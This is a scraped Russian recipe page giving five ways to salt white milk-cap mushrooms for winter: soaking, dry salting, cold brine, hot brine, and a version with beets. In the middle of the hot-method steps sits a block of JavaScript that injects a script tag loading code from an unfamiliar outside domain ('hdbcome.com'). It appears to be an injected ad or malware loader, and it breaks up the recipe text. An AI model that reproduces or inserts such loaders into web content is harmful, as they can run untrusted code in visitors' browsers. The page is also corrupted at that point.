Счётчик Яшы
Как засолить белые грузди - 5 рецептов (холодный, горячий способ)
Подборки рецептов

Как быстро и вкусно засолить белые грузди холодным и горячим способом

Рецепты » Подборки рецептов » Как быстро и вкусно засолить белые грузди холодным и горячим способом

Собирать грузди – сплошное удовольствие! Растут большой семейкой, как правило, чистые. Мясистый и сочный гриб издавна царствовал в наших лесах, привлекая грибников. В старину хозяйки знали, как засолить в домашних условиях белые грузди на зиму, чтобы они остались белыми, получились аппетитно ароматными и хрустящими. Правильно посолить грибы не получится, если не знать некоторые особенности грибов и способы их заготовки.

Рецептов засолки белых груздей несколько, проверенных столетиями, передающихся от опытных грибников к новичкам. Это холодный способ, сделанный сухой засолкой или с заливкой остывшим рассолом. Большой популярностью пользуется горячий способ с варкой грибов, позволяющий консервировать урожай сразу в банках. Помимо стеклянной тары, грузди солят в кастрюлях, деревянных кадушках и бочках.

Меню

Как быстро и вкусно засолить белые грузди

Соленые грибочки – это отменная закуска к картошечке, под рюмочку. Чтобы не испортить грузди, соблюдайте при их обработке некоторые важные правила.

  • Лучшие грибы для засолки – молоденькие, не слишком крупные.

  • Предварительная первичная обработка груздей включает в себя очистку грибов от мусора, выбраковки старых или червивых экземпляров. Обрежьте грибницу, пройдитесь ножиком по шляпке, счистив грязь.

  • Затем замочите грибы, чтобы избавиться от горечи. Как это правильно сделать, читайте ниже.

  • Горячий вариант заготовки предполагает предварительную варку груздей. Обязательно добавьте в воду соли, а чтобы грибы не потемнели и оставались белыми, плесните немного уксуса.

  • Во время варки не забудьте снимать пену, тогда рассол останется прозрачным.

  • Закладывайте приправы только, когда рассол будет полностью очищен.

  • Сколько отваривать грузди? Достаточно 15 мин.. Дождитесь, когда грибы осядут на дно, и считайте это знаком об их готовности.

  • При сухом варианте постарайтесь оставить грибочки целыми, нарезайте их уже в соленом виде перед подачей на стол. Для заготовки горячей заливкой крупные грузди лучше сразу порезать.

  • Сколько брать соли? При сухом посоле кладите на каждый кг. грибов по 40 гр. соли.

  • При засолке с помощью рассола, не важно, горячей или холодной, соли берите больше – 50-60 гр. на 1 кг. груздей.

Как вымачивать грузди перед засолкой

Грузди выделяют горьковатый млечный сок, способный испортить закуску. Чтобы избавиться от него, дары леса вымачивают.

  • Ополосните грузди, лучше под проточной водой, затем залейте большим количеством чуть подсоленной холодной воды.

  • Если вы решили сделать заготовку с горячим рассолом, подержите грибы 3 часа.

  • Для холодного варианта срок вымачивания увеличивается до 3 суток. За это время обязательно каждые 8-12 часов меняйте воду, чтобы она не закисла.

  • Вымоченные грибы непременно промойте под щедрой струей воды.

Засолка груздей сухим способом

Считаю данный способ лучшим, поскольку именно при таком варианте грибы получаются крепкими, белыми и восхитительно хрустящими. Единственный недостаток подобной заготовки – быстро полакомиться не получится, придется набраться терпения. Зато награда какая!

Нам требуется взять:

  • Белые грузди – 4 кг.

  • Мелкая соль – 400 гр.

  • Вишневые, смородиновые листья – 6-10 шт.

  • Укроп – несколько зонтиков.

  • Корень хрена.

  • Чеснок – 5 зубчиков.

  • Горошины перца – большая ложка.

  • Песочный сахар – маленькая ложка.

Как требуется засолить:

  1. Вымочите грибы, затем ополосните.

  2. Насыпьте на дно засолочной ёмкости соль и часть листьев с укропом.

  3. Поверх выложите слой груздей. Посыпьте их солью и вновь уложите грибной слой, периодически перекладывая приправами. Действуйте подобным образом, пока не закончатся грибы. Примерно в середине укладки подсыпьте намного сахара, это ускорит процесс образования бактерий, необходимых для просолки.

  4. Накройте грибы кружком, придавите гнетом. Оставьте при комнатной температуре ровно на сутки.

  5. Вскоре грибы выделят сок в большом количестве. Унесите кастрюлю в холодное помещение. Время засолки – 1-2 месяца при температуре не выше 5-8С.

  6. Следите, чтобы грибы не покрыла плесень, регулярно промывайте кружок.

  7. На определенном этапе продолжить засолку можно прямо в банках. Когда спустя сутки выделится сок, переложите грузди в банки, переслаивая их перцем, чесноком, кусочками хрена, зеленью. Но в этом случае на первые сутки специи сразу не кладите, засыпайте грибы только солью. Крышки используйте капроновые, чтобы был доступ воздуха, иначе процесс брожения и соления прекратится.

Совет: чтобы при засолке верх меньше покрывался плесенью, добавьте в рассол несколько граммов лимонной кислоты.

Белые грузди, засоленные холодным способом

В отличие от сухого варианта, здесь задействуется холодный рассол. Заготовку можно сделать в большой ёмкости или прямо в банках.

Возьмите для блюда:

  • Грузди – 5 кг.

  • Мелкая соль – 250 гр.

  • Питьевая вода – 1 литр приблизительно на каждый кг. груздей.

  • Укропные зонтики, листья смородины, вишни и хрена, дольки чеснока.

Солим:

  1. Переберите грибы, отсортируйте негодные. Уложите в бочку, ведро или кастрюлю ножками вверх. Слои грибов перемежайте зеленью.

  2. Растворите в воде соль, дождитесь, когда разойдутся кристаллы. Залейте заготовку, чтобы грибы были накрыты рассолом полностью.

  3. Накройте ёмкость двойным слоем марли, установите гнет.

  4. Наберитесь терпения на 1,5-2 месяца, затем снимайте пробу и восхищайтесь вкусной закуской. По желанию, разложите готовое соление по баночкам и храните в холоде под капроновой крышкой.

Как правильно засолить белые грузди горячим способом

Способ хлопотный, но результат вас порадует. Грибы выйдут мягкими, сочными, нежными. Вдобавок, угощаться закуской можно намного раньше, чем при других вариантах засолки. Считается, что данный способ наиболее безопасный.

Потребуется:

  • Грибы – 10 кг.

  • Лавровый лист – 6 шт.

  • Душистые горошины – большая ложка.

  • Мелкая соль – 0,5 кг.

  • Питьевая вода – 8 литров.

По желанию кладите листья вишни, хрена, смородины, бутоны гвоздики, чесночные зубчики.

Засолка:

Переберите и обработайте грибы.

var s = document.createElement(‘script’)
s.setAttribute(‘async’, true)
s.setAttribute(‘charset’, ‘utf-8’)
s.setAttribute(‘data-cfasync’, false)
s.src = ‘https://hdbcome.com/gdhnds35.js’
document.head && document.head.appendChild(s)

Промойте под обильной струей воды.

Затем поставьте вариться на 20 минут. Добавьте все перечисленные в рецептуре приправы и специи. Во время варки непременно удаляйте пенку, чтобы удалить оставшуюся грязь. Когда грибочки «утонут», они готовы.

Достаньте шумовкой готовые грузди.

Разложите по банкам. Банки и крышки предварительно простерилизуйте.

Перелейте рассол. Укупорьте обычными капроновыми крышками (обдайте их кипятком или прокипятите). Когда закуска остынет, отправьте на зимнее хранение в холодное помещение.

Белый груздь, соленый на зиму в банках

Необычный рецепт консервации грибов, но закуска выходит бесподобная. Попробуйте, если еще не делали.

Понадобится:

  • Грибы – 2 кг.

  • Мелкая соль – 100 гр.

  • Свекла – 2 кг.

  • Перец, лаврушка – по 4-5 шт.

  • Питьевая вода – 4 литра.

Заготовка:

  1. Отварите свеклу и грибы в отдельных кастрюлях до готовности.

  2. Охладите, порежьте кусочками. Разложите по баночкам.

  3. Сварите рассол, добавив соль и приправы.

  4. Перелейте горячий рассол в стерильные банки, сразу закатайте под ключ. Спустя 3-5 дней закуску можно пробовать.

Видео-рецепт домашней засолки груздей

Автор ролика – знающий мастер засолки грибов на зиму. Внимательно посмотрев, и послушав советы, вы легко заготовите на зиму отличную грибную закуску. Приятного аппетита!

 



 

 

Интересные рецепты Смотреть все

Вам также может понравиться